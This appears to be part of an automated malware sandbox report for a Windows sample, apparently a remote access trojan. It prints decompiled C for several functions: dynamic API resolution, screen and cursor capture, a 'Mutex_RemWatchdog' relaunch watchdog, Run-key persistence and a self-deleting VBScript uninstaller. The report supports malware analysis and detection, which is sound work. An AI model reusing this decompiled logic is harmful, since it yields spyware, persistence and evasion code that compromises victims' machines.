				 *0x73bd20 = GetProcAddress(LoadLibraryA("Shell32"), "IsUserAnAdmin");
				 *0x73bd14 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
				 *0x73bd30 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
				 *0x73bd34 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
				 *0x73bd18 = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
				_t24 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
				 *0x73bb04 = _t24;
				return _t24;
			}





                                    0x006dcd25
                                    0x006dcd2d
                                    0x006dcd34
                                    0x006dcd45
                                    0x006dcd45
                                    0x006dcd60
                                    0x006dcd65
                                    0x006dcd76
                                    0x006dcd76
                                    0x006dcd94
                                    0x006dcda8
                                    0x006dcdbc
                                    0x006dcdd0
                                    0x006dcde4
                                    0x006dcdf8
                                    0x006dce0c
                                    0x006dce20
                                    0x006dce31
                                    0x006dce39
                                    0x006dce3d
                                    0x006dce43

                                    APIs
                                    • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,00000000,0073C548,00000001,006DC505), ref: 006DCD1C
                                    • GetProcAddress.KERNEL32(00000000), ref: 006DCD25
                                    • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA), ref: 006DCD40
                                    • GetProcAddress.KERNEL32(00000000), ref: 006DCD43
                                    • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW), ref: 006DCD54
                                    • GetProcAddress.KERNEL32(00000000), ref: 006DCD57
                                    • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW), ref: 006DCD71
                                    • GetProcAddress.KERNEL32(00000000), ref: 006DCD74
                                    • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 006DCD85
                                    • GetProcAddress.KERNEL32(00000000), ref: 006DCD88
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 006DCD99
                                    • GetProcAddress.KERNEL32(00000000), ref: 006DCD9C
                                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 006DCDAD
                                    • GetProcAddress.KERNEL32(00000000), ref: 006DCDB0
                                    • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW), ref: 006DCDC1
                                    • GetProcAddress.KERNEL32(00000000), ref: 006DCDC4
                                    • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin), ref: 006DCDD5
                                    • GetProcAddress.KERNEL32(00000000), ref: 006DCDD8
                                    • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy), ref: 006DCDE9
                                    • GetProcAddress.KERNEL32(00000000), ref: 006DCDEC
                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW), ref: 006DCDFD
                                    • GetProcAddress.KERNEL32(00000000), ref: 006DCE00
                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors), ref: 006DCE11
                                    • GetProcAddress.KERNEL32(00000000), ref: 006DCE14
                                    • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW), ref: 006DCE25
                                    • GetProcAddress.KERNEL32(00000000), ref: 006DCE28
                                    • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 006DCE36
                                    • GetProcAddress.KERNEL32(00000000), ref: 006DCE39
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$HandleModule$LibraryLoad
                                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$user32
                                    • API String ID: 551388010-3474354060
                                    • Opcode ID: a87527bf8e150b06e3d414be395fe143ec9561e3a46328979f7d20c6b163bbd2
                                    • Instruction ID: 2478b9249250baaa49f9baf7062def5b17960ac9a2177a896d8346717b2af3da
                                    • Opcode Fuzzy Hash: a87527bf8e150b06e3d414be395fe143ec9561e3a46328979f7d20c6b163bbd2
                                    • Instruction Fuzzy Hash: 9421E3E1F9139C75F610BBB25C6ED1B2D58EA85B51F009816F20497192DBBCC510CFE8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E4906, Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 298windowmemoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 81%
                                    			E006E4906(void* __ecx, char __edx, void* __eflags, signed int _a4) {
				void* _v12;
				char _v13;
				struct HDC__* _v20;
				signed int _v24;
				signed int _v28;
				int _v32;
				int _v36;
				struct HDC__* _v40;
				void* _v46;
				intOrPtr _v50;
				intOrPtr _v54;
				char _v56;
				char _v80;
				intOrPtr _v84;
				struct tagCURSORINFO _v100;
				signed int _v106;
				signed int _v108;
				long _v116;
				long _v120;
				char _v124;
				struct _ICONINFO _v144;
				char _v168;
				void* __ebx;
				int _t114;
				void* _t115;
				void* _t116;
				void* _t120;
				int _t127;
				void* _t128;
				signed char _t140;
				long _t146;
				void* _t147;
				int _t149;
				void* _t157;
				void* _t186;
				void* _t188;
				void* _t194;
				int _t199;
				void* _t204;
				void* _t223;
				signed int _t226;
				struct HDC__* _t228;
				struct HDC__* _t232;
				struct tagBITMAPINFO* _t234;
				void* _t235;
				int _t241;

				_v13 = __edx;
				_t194 = __ecx;
				_t232 = CreateDCA("DISPLAY", 0, 0, 0);
				_v20 = _t232;
				_t228 = CreateCompatibleDC(_t232);
				_v40 = _t228;
				_v32 = E006E4D3D( *((intOrPtr*)(0x73bd78 + _a4 * 4)));
				_t114 = E006E4D89( *((intOrPtr*)(0x73bd78 + _a4 * 4)));
				_t199 = _v32;
				_v36 = _t114;
				if(_t199 != 0 || _t114 != 0) {
					_t115 = CreateCompatibleBitmap(_t232, _t199, _t114);
					_v12 = _t115;
					__eflags = _t115;
					if(_t115 != 0) {
						_t116 = SelectObject(_t228, _t115);
						__eflags = _t116;
						if(_t116 != 0) {
							_v28 = _v28 & 0x00000000;
							_v24 = _v24 & 0x00000000;
							E006E4DCA( *((intOrPtr*)(0x73bd78 + _a4 * 4)),  &_v28);
							_t120 = StretchBlt(_t228, 0, 0, _v32, _v36, _t232, _v28, _v24, _v32, _v36, 0xcc0020);
							__eflags = _t120;
							if(_t120 == 0) {
								goto L7;
							}
							__eflags = _v13;
							if(_v13 != 0) {
								_v100.cbSize = 0x14;
								_t186 = GetCursorInfo( &_v100);
								__eflags = _t186;
								if(_t186 != 0) {
									_t188 = GetIconInfo(_v100.hCursor,  &_v144);
									__eflags = _t188;
									if(_t188 != 0) {
										_t241 = _v84 - _v144.yHotspot - _v24;
										__eflags = _t241;
										DeleteObject(_v144.hbmColor);
										DeleteObject(_v144.hbmMask);
										_t228 = _v40;
										DrawIcon(_t228, _v100.ptScreenPos - _v144.xHotspot - _v28, _t241, _v100.hCursor);
										_t232 = _v20;
									}
								}
							}
							_push( &_v124);
							_t127 = 0x18;
							_t128 = GetObjectA(_v12, _t127, ??);
							__eflags = _t128;
							if(_t128 == 0) {
								goto L7;
							} else {
								_t226 = _v106 * _v108 & 0x0000ffff;
								__eflags = _t226 - 1;
								if(_t226 != 1) {
									_push(4);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										L24:
										__eflags = 1 << 1;
										_push(0x2eb6edc);
										L25:
										_t234 = LocalAlloc(0x40, ??);
										_t204 = 0x18;
										_t234->bmiHeader = 0x28;
										_t234->bmiHeader.biWidth = _v120;
										_t234->bmiHeader.biHeight = _v116;
										_t234->bmiHeader.biPlanes = _v108;
										_t234->bmiHeader.biBitCount = _v106;
										_t140 = _a4;
										__eflags = _t140 - _t204;
										if(_t140 < _t204) {
											__eflags = 1;
											_t234->bmiHeader.biClrUsed = 1 << _t140;
										}
										_t234->bmiHeader.biCompression = _t234->bmiHeader.biCompression & 0x00000000;
										_t234->bmiHeader.biClrImportant = _t234->bmiHeader.biClrImportant & 0x00000000;
										asm("cdq");
										_t227 = _t226 & 0x00000007;
										_t146 = (_t234->bmiHeader.biWidth + 7 + (_t226 & 0x00000007) >> 3) * (_a4 & 0x0000ffff) * _t234->bmiHeader.biHeight;
										_t234->bmiHeader.biSizeImage = _t146;
										_t147 = GlobalAlloc(0, _t146);
										_a4 = _t147;
										__eflags = _t147;
										if(_t147 != 0) {
											_t149 = GetDIBits(_t228, _v12, 0, _t234->bmiHeader.biHeight & 0x0000ffff, _t147, _t234, 0);
											__eflags = _t149;
											if(_t149 != 0) {
												_v56 = 0x4d42;
												_v54 = _t234->bmiHeader + _t234->bmiHeader.biSizeImage + _t234->bmiHeader.biClrUsed * 4 + 0xe;
												_v50 = 0;
												_t157 = _t234->bmiHeader + _t234->bmiHeader.biClrUsed * 4 + 0xe;
												__eflags = _t157;
												_v46 = _t157;
												E006D20D5(_t194,  &_v80);
												E006D20D5(_t194,  &_v168);
												E006D251D(_t194,  &_v80, _t227, __eflags,  &_v56, 0xe);
												E006D3436( &_v80);
												E006D251D(_t194,  &_v80, _t227, __eflags, _t234, 0x28);
												E006D3436( &_v80);
												_t235 = _a4;
												E006D251D(_t194,  &_v80, _t227, __eflags, _t235, _t234->bmiHeader.biSizeImage);
												E006D3436( &_v80);
												DeleteObject(_v12);
												GlobalFree(_t235);
												DeleteDC(_v20);
												DeleteDC(_t228);
												E006D2044(_t194, _t194, __eflags,  &_v168);
												E006D1FC7();
												E006D1FC7();
												goto L32;
											}
											DeleteDC(_v20);
											DeleteDC(_t228);
											DeleteObject(_v12);
											GlobalFree(_a4);
											goto L2;
										} else {
											_push(_v20);
											L8:
											DeleteDC();
											DeleteDC(_t228);
											_push(_v12);
											goto L5;
										}
									}
									_push(8);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										goto L24;
									}
									_push(0x10);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										goto L24;
									}
									_t223 = 0x18;
									__eflags = _t226 - _t223;
									if(_t226 > _t223) {
										_push(0x20);
										_pop(1);
										L23:
										_a4 = 1;
										goto L24;
									}
									_a4 = _t223;
									_push(0x28);
									goto L25;
								}
								goto L23;
							}
						}
						L7:
						_push(_t232);
						goto L8;
					} else {
						DeleteDC(_t232);
						DeleteDC(_t228);
						_push(0);
						L5:
						DeleteObject();
						goto L2;
					}
				} else {
					L2:
					E006D2084(_t194, _t194, 0x72f6bc);
					L32:
					return _t194;
				}
			}

















































                                    0x006e4914
                                    0x006e491f
                                    0x006e4927
                                    0x006e492a
                                    0x006e4936
                                    0x006e4938
                                    0x006e4947
                                    0x006e4954
                                    0x006e4959
                                    0x006e495c
                                    0x006e4961
                                    0x006e497b
                                    0x006e4981
                                    0x006e4984
                                    0x006e4986
                                    0x006e49a0
                                    0x006e49a6
                                    0x006e49a8
                                    0x006e49c1
                                    0x006e49c5
                                    0x006e49d0
                                    0x006e49f0
                                    0x006e49f6
                                    0x006e49f8
                                    0x00000000
                                    0x00000000
                                    0x006e49fa
                                    0x006e49fe
                                    0x006e4a03
                                    0x006e4a0b
                                    0x006e4a11
                                    0x006e4a13
                                    0x006e4a1f
                                    0x006e4a25
                                    0x006e4a27
                                    0x006e4a41
                                    0x006e4a41
                                    0x006e4a44
                                    0x006e4a4d
                                    0x006e4a58
                                    0x006e4a5c
                                    0x006e4a62
                                    0x006e4a62
                                    0x006e4a27
                                    0x006e4a13
                                    0x006e4a68
                                    0x006e4a6b
                                    0x006e4a70
                                    0x006e4a76
                                    0x006e4a78
                                    0x00000000
                                    0x006e4a7e
                                    0x006e4a85
                                    0x006e4a8b
                                    0x006e4a8e
                                    0x006e4a94
                                    0x006e4a96
                                    0x006e4a97
                                    0x006e4a9a
                                    0x006e4a9d
                                    0x006e4aca
                                    0x006e4aca
                                    0x006e4ad3
                                    0x006e4ad4
                                    0x006e4adc
                                    0x006e4ae0
                                    0x006e4ae1
                                    0x006e4aea
                                    0x006e4af0
                                    0x006e4af7
                                    0x006e4aff
                                    0x006e4b03
                                    0x006e4b06
                                    0x006e4b09
                                    0x006e4b10
                                    0x006e4b12
                                    0x006e4b12
                                    0x006e4b1e
                                    0x006e4b22
                                    0x006e4b26
                                    0x006e4b27
                                    0x006e4b35
                                    0x006e4b3c
                                    0x006e4b3f
                                    0x006e4b45
                                    0x006e4b48
                                    0x006e4b4a
                                    0x006e4b63
                                    0x006e4b69
                                    0x006e4b6b
                                    0x006e4b98
                                    0x006e4bac
                                    0x006e4bb1
                                    0x006e4bbc
                                    0x006e4bbc
                                    0x006e4bc2
                                    0x006e4bc5
                                    0x006e4bd0
                                    0x006e4bde
                                    0x006e4bed
                                    0x006e4bf8
                                    0x006e4c07
                                    0x006e4c0f
                                    0x006e4c16
                                    0x006e4c25
                                    0x006e4c2d
                                    0x006e4c34
                                    0x006e4c43
                                    0x006e4c46
                                    0x006e4c51
                                    0x006e4c5c
                                    0x006e4c64
                                    0x00000000
                                    0x006e4c64
                                    0x006e4b76
                                    0x006e4b79
                                    0x006e4b7e
                                    0x006e4b88
                                    0x00000000
                                    0x006e4b4c
                                    0x006e4b4c
                                    0x006e49ab
                                    0x006e49b1
                                    0x006e49b4
                                    0x006e49b6
                                    0x00000000
                                    0x006e49b6
                                    0x006e4b4a
                                    0x006e4a9f
                                    0x006e4aa1
                                    0x006e4aa2
                                    0x006e4aa5
                                    0x006e4aa8
                                    0x00000000
                                    0x00000000
                                    0x006e4aaa
                                    0x006e4aac
                                    0x006e4aad
                                    0x006e4ab0
                                    0x006e4ab3
                                    0x00000000
                                    0x00000000
                                    0x006e4ab7
                                    0x006e4ab8
                                    0x006e4abb
                                    0x006e4ac4
                                    0x006e4ac6
                                    0x006e4ac7
                                    0x006e4ac7
                                    0x00000000
                                    0x006e4ac7
                                    0x006e4abd
                                    0x006e4ac0
                                    0x00000000
                                    0x006e4ac0
                                    0x00000000
                                    0x006e4a90
                                    0x006e4a78
                                    0x006e49aa
                                    0x006e49aa
                                    0x00000000
                                    0x006e4988
                                    0x006e498f
                                    0x006e4992
                                    0x006e4994
                                    0x006e4996
                                    0x006e4996
                                    0x00000000
                                    0x006e4996
                                    0x006e4967
                                    0x006e4967
                                    0x006e496e
                                    0x006e4c6b
                                    0x006e4c71
                                    0x006e4c71

                                    APIs
                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 006E4921
                                    • CreateCompatibleDC.GDI32(00000000), ref: 006E492D
                                    • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 006E497B
                                    • DeleteDC.GDI32(00000000), ref: 006E498F
                                    • DeleteDC.GDI32(00000000), ref: 006E4992
                                    • DeleteObject.GDI32(?), ref: 006E4996
                                    • SelectObject.GDI32(00000000,00000000), ref: 006E49A0
                                    • DeleteDC.GDI32(00000000), ref: 006E49B1
                                    • DeleteDC.GDI32(00000000), ref: 006E49B4
                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 006E49F0
                                    • GetCursorInfo.USER32(?,?,?), ref: 006E4A0B
                                    • GetIconInfo.USER32(?,?), ref: 006E4A1F
                                    • DeleteObject.GDI32(?), ref: 006E4A44
                                    • DeleteObject.GDI32(?), ref: 006E4A4D
                                    • DrawIcon.USER32 ref: 006E4A5C
                                    • GetObjectA.GDI32(?,00000018,?), ref: 006E4A70
                                    • LocalAlloc.KERNEL32(00000040,00000001,?,?), ref: 006E4AD6
                                    • GlobalAlloc.KERNEL32(00000000,?,?,?), ref: 006E4B3F
                                    • GetDIBits.GDI32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 006E4B63
                                    • DeleteDC.GDI32(?), ref: 006E4B76
                                    • DeleteDC.GDI32(00000000), ref: 006E4B79
                                    • DeleteObject.GDI32(?), ref: 006E4B7E
                                    • GlobalFree.KERNEL32 ref: 006E4B88
                                    • DeleteObject.GDI32(?), ref: 006E4C2D
                                    • GlobalFree.KERNEL32 ref: 006E4C34
                                    • DeleteDC.GDI32(?), ref: 006E4C43
                                    • DeleteDC.GDI32(00000000), ref: 006E4C46
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDrawLocalSelectStretch
                                    • String ID: DISPLAY
                                    • API String ID: 860969378-865373369
                                    • Opcode ID: 3172f92cab3b659c704e324b27ff9a8ad77c755772dd1d9cc5460d03d65daa61
                                    • Instruction ID: ff00a4fdebab9da88cbcfb0f73e1a87002ae56ee4cf3ce1a9dfd7395aac45774
                                    • Opcode Fuzzy Hash: 3172f92cab3b659c704e324b27ff9a8ad77c755772dd1d9cc5460d03d65daa61
                                    • Instruction Fuzzy Hash: 30B16F71E01219AFDB20DFA5DC45BEEBBBAEF44710F008019F945E7250DB38AA45CB68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006DFD95, Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 181synchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 94%
                                    			E006DFD95() {
				long _v8;
				char _v32;
				short _v556;
				short _v1076;
				short _v1596;
				short _v2116;
				void* _t27;
				void* _t28;
				void* _t31;
				long _t37;
				int _t41;
				long _t50;
				void* _t55;
				void* _t68;
				void* _t70;
				int _t71;
				void* _t72;
				long _t73;
				void* _t110;
				void* _t112;
				void* _t115;
				void* _t116;

				_t71 = 0;
				_v8 = _t73;
				CreateMutexA(0, 1, "Mutex_RemWatchdog");
				GetModuleFileNameW(0,  &_v2116, 0x104);
				_t27 = E006D2489();
				_t28 = E006D1F95(0x73c560);
				_t108 = 0x73c518;
				_t31 = E006E0A30(E006D1F95(0x73c518), "exepath",  &_v556, 0x208, _t28, _t27);
				_t116 = _t115 + 0x14;
				if(_t31 != 0) {
					E006D20D5(0,  &_v32);
					if(E006E79DC( &_v556,  &_v32) == 0) {
						goto L1;
					}
					_t110 = OpenProcess(0x100000, 0, _v8);
					WaitForSingleObject(_t110, 0xffffffff);
					CloseHandle(_t110);
					_t37 = GetCurrentProcessId();
					if(E006E0BB0(0x73c518, E006D1F95(0x73c518), "WDH", _t37) == 0) {
						L18:
						_push(1);
						L2:
						ExitProcess();
					}
					_t108 = ShellExecuteW;
					do {
						_t41 = PathFileExistsW( &_v556);
						_t42 =  &_v556;
						if(_t41 != 0) {
							L11:
							ShellExecuteW(_t71, L"open", _t42, _t71, _t71, 1);
							L12:
							do {
								_t72 = E006E0885(E006D1F95(0x73c518), "WD",  &_v8);
								_t122 = _t72;
								if(_t72 == 0) {
									Sleep(0x1f4);
								} else {
									E006E0CE2(E006D1F95(0x73c518), _t122, "WD");
								}
							} while (_t72 == 0);
							goto L17;
						}
						_t55 = E006D2489();
						if(E006E7947(E006D1F95( &_v32), _t55,  &_v556, _t71) == 0) {
							E00701F00(_t108,  &_v1596, _t71, 0x208);
							_t116 = _t116 + 0xc;
							GetTempPathW(0x104,  &_v1596);
							GetTempFileNameW( &_v1596, L"temp_", _t71,  &_v1076);
							lstrcatW( &_v1076, L".exe");
							_t68 = E006D2489();
							_t70 = E006E7947(E006D1F95( &_v32), _t68,  &_v1076, _t71);
							__eflags = _t70;
							if(_t70 == 0) {
								goto L12;
							}
							_t42 =  &_v1076;
							goto L11;
						}
						_t42 =  &_v556;
						goto L11;
						L17:
						_t71 = 0;
						_t112 = OpenProcess(0x100000, 0, _v8);
						WaitForSingleObject(_t112, 0xffffffff);
						CloseHandle(_t112);
						_t50 = GetCurrentProcessId();
					} while (E006E0BB0(0x73c518, E006D1F95(0x73c518), "WDH", _t50) != 0);
					goto L18;
				}
				L1:
				_push(_t71);
				goto L2;
			}

























                                    0x006dfda8
                                    0x006dfdaa
                                    0x006dfdae
                                    0x006dfdc1
                                    0x006dfdce
                                    0x006dfdd6
                                    0x006dfde7
                                    0x006dfdfb
                                    0x006dfe00
                                    0x006dfe05
                                    0x006dfe11
                                    0x006dfe26
                                    0x00000000
                                    0x00000000
                                    0x006dfe37
                                    0x006dfe3c
                                    0x006dfe43
                                    0x006dfe49
                                    0x006dfe67
                                    0x006dffde
                                    0x006dffde
                                    0x006dfe08
                                    0x006dfe08
                                    0x006dfe08
                                    0x006dfe6d
                                    0x006dfe73
                                    0x006dfe7a
                                    0x006dfe82
                                    0x006dfe88
                                    0x006dff3e
                                    0x006dff49
                                    0x006dff4b
                                    0x006dff50
                                    0x006dff67
                                    0x006dff6b
                                    0x006dff6d
                                    0x006dff8a
                                    0x006dff6f
                                    0x006dff7d
                                    0x006dff82
                                    0x006dff90
                                    0x00000000
                                    0x006dff50
                                    0x006dfe93
                                    0x006dfeaf
                                    0x006dfec9
                                    0x006dfece
                                    0x006dfedd
                                    0x006dfef7
                                    0x006dff09
                                    0x006dff1a
                                    0x006dff2d
                                    0x006dff34
                                    0x006dff36
                                    0x00000000
                                    0x00000000
                                    0x006dff38
                                    0x00000000
                                    0x006dff38
                                    0x006dfeb1
                                    0x00000000
                                    0x006dff94
                                    0x006dff97
                                    0x006dffa5
                                    0x006dffaa
                                    0x006dffb1
                                    0x006dffb7
                                    0x006dffd6
                                    0x00000000
                                    0x006dfe73
                                    0x006dfe07
                                    0x006dfe07
                                    0x00000000

                                    APIs
                                    • CreateMutexA.KERNEL32(00000000,00000001,Mutex_RemWatchdog,0073C578,0073C518,00000000), ref: 006DFDAE
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 006DFDC1
                                      • Part of subcall function 006E0A30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 006E0A4C
                                      • Part of subcall function 006E0A30: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 006E0A65
                                      • Part of subcall function 006E0A30: RegCloseKey.ADVAPI32(00000000), ref: 006E0A70
                                    • ExitProcess.KERNEL32 ref: 006DFE08
                                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 006DFE31
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 006DFE3C
                                    • CloseHandle.KERNEL32(00000000), ref: 006DFE43
                                    • GetCurrentProcessId.KERNEL32 ref: 006DFE49
                                    • PathFileExistsW.SHLWAPI(?), ref: 006DFE7A
                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 006DFF49
                                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 006DFF9F
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 006DFFAA
                                    • CloseHandle.KERNEL32(00000000), ref: 006DFFB1
                                    • GetCurrentProcessId.KERNEL32 ref: 006DFFB7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CloseOpen$CurrentFileHandleObjectSingleWait$CreateExecuteExistsExitModuleMutexNamePathQueryShellValue
                                    • String ID: .exe$Mutex_RemWatchdog$WDH$exepath$open$temp_
                                    • API String ID: 2645874385-232273909
                                    • Opcode ID: a3cc4e65a94d855b261ebd063ce953ab8109c2da247c8125055ba7b4973aef61
                                    • Instruction ID: 302b3a5c33ca826a48e355d34867b1f366930503cca517aa805274e5c013efe8
                                    • Opcode Fuzzy Hash: a3cc4e65a94d855b261ebd063ce953ab8109c2da247c8125055ba7b4973aef61
                                    • Instruction Fuzzy Hash: 3D51B871E00209BFDB10AB609C59EFE33AEAB05710F10416AF505A7392DF7C9E468798
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006DB0E2, Relevance: 38.8, APIs: 6, Strings: 16, Instructions: 280registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 98%
                                    			E006DB0E2(char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				short _v692;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t53;
				void* _t54;
				void* _t57;
				signed int _t61;
				void* _t62;
				void* _t78;
				void* _t79;
				void* _t92;
				void* _t93;
				signed char _t134;
				void* _t243;
				void* _t245;
				void* _t246;
				void* _t247;

				E006E015B();
				if( *0x73a9d4 != 0x30) {
					E006D9D73();
				}
				_t243 =  *0x73bd6b - 1; // 0x0
				if(_t243 == 0) {
					E006E537E(_t243);
				}
				if( *0x73ba75 != 0) {
					E006E7754(E006D1EEB(0x73c0e0));
				}
				_t231 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				_t245 =  *0x73bb02 - 1; // 0x0
				if(_t245 == 0) {
					E006E0D5C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E006D1EEB(0x73c4e8));
				}
				_t246 =  *0x73bafb - 1; // 0x0
				if(_t246 == 0) {
					E006E0D5C(0x80000002, _t231, E006D1EEB(0x73c4e8));
				}
				_t247 =  *0x73bb00 - 1; // 0x0
				if(_t247 == 0) {
					E006E0D5C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E006D1EEB(0x73c4e8));
				}
				_t53 = E006D2489();
				_t54 = E006D1F95(0x73c560);
				_t57 = E006E0A30(E006D1F95(0x73c518), "exepath",  &_v692, 0x208, _t54, _t53);
				_t248 = _t57;
				if(_t57 == 0) {
					GetModuleFileNameW(0,  &_v692, 0x208);
				}
				RegDeleteKeyA(0x80000001, E006D1F95(0x73c518));
				_t61 = SetFileAttributesW( &_v692, 0x80);
				_t140 = 0x73c530;
				asm("sbb bl, bl");
				_t134 =  ~_t61 & 0x00000001;
				_t62 = E006D74E4(_t248);
				_t249 = _t62;
				if(_t62 != 0) {
					_t140 = 0x73c530;
					SetFileAttributesW(E006D1EEB(0x73c530), 0x80);
				}
				E006D30A6(_t134,  &_v124, E006D427F(_t134,  &_v52, E0070987F(_t134, _t140, _t249, L"Temp")), 0, _t249, L"\\update.vbs");
				E006D1EF0();
				E006D4405(_t134,  &_v28, L"On Error Resume Next\n", _t249, E006D427F(_t134,  &_v52, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
				E006D1EF0();
				_t250 = _t134;
				if(_t134 != 0) {
					E006D3311(E006D30A6(_t134,  &_v52, E006D4405(_t134,  &_v76, L"while fso.FileExists(\"", _t250, E006D427F(_t134,  &_v100,  &_v692)), 0, _t250, L"\")\n"));
					E006D1EF0();
					E006D1EF0();
					E006D1EF0();
				}
				E006D3311(E006D30A6(_t134,  &_v100, E006D30A6(_t134,  &_v76, E006D427F(_t134,  &_v52, L"fso.DeleteFile \""), 0, _t250,  &_v692), 0, _t250, L"\"\n"));
				E006D1EF0();
				E006D1EF0();
				E006D1EF0();
				_t251 = _t134;
				if(_t134 != 0) {
					E006D766C(_t134,  &_v28, 0, L"wend\n");
				}
				_t78 = E006D74E4(_t251);
				_t252 = _t78;
				if(_t78 != 0) {
					E006D3311(E006D30A6(0x72f724,  &_v100, E006D9E69( &_v76, L"fso.DeleteFolder \"", _t252, 0x73c530), 0, _t252, L"\"\n"));
					E006D1EF0();
					E006D1EF0();
				}
				_t79 = E006D427F(0x72f724,  &_v172, L"\"\"\", 0");
				E006D3311(E006D30A6(0x72f724,  &_v100, E006D3030( &_v76, E006D4429(0x72f724,  &_v52, E006D427F(0x72f724,  &_v148, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), _t252,  &_a4), _t79), 0, _t252, "\n"));
				E006D1EF0();
				E006D1EF0();
				E006D1EF0();
				E006D1EF0();
				E006D1EF0();
				E006D766C(0x72f724,  &_v28, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_t92 = E006D1EEB( &_v124);
				_t93 = E006D2489();
				if(E006E7947(E006D1EEB( &_v28), _t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, L"open", E006D1EEB( &_v124), 0x72f724, 0x72f724, 0) > 0x20) {
					ExitProcess(0);
				}
				E006D1EF0();
				E006D1EF0();
				return E006D1EF0();
			}




























                                    0x006db0ee
                                    0x006db0fa
                                    0x006db0fc
                                    0x006db0fc
                                    0x006db104
                                    0x006db10a
                                    0x006db10c
                                    0x006db10c
                                    0x006db118
                                    0x006db126
                                    0x006db126
                                    0x006db130
                                    0x006db135
                                    0x006db13b
                                    0x006db14c
                                    0x006db151
                                    0x006db152
                                    0x006db158
                                    0x006db169
                                    0x006db16e
                                    0x006db16f
                                    0x006db175
                                    0x006db189
                                    0x006db18e
                                    0x006db196
                                    0x006db19e
                                    0x006db1c4
                                    0x006db1ce
                                    0x006db1d0
                                    0x006db1db
                                    0x006db1db
                                    0x006db1ee
                                    0x006db206
                                    0x006db211
                                    0x006db216
                                    0x006db218
                                    0x006db21b
                                    0x006db220
                                    0x006db222
                                    0x006db229
                                    0x006db234
                                    0x006db234
                                    0x006db254
                                    0x006db25d
                                    0x006db278
                                    0x006db281
                                    0x006db286
                                    0x006db288
                                    0x006db2bc
                                    0x006db2c4
                                    0x006db2cc
                                    0x006db2d4
                                    0x006db2d4
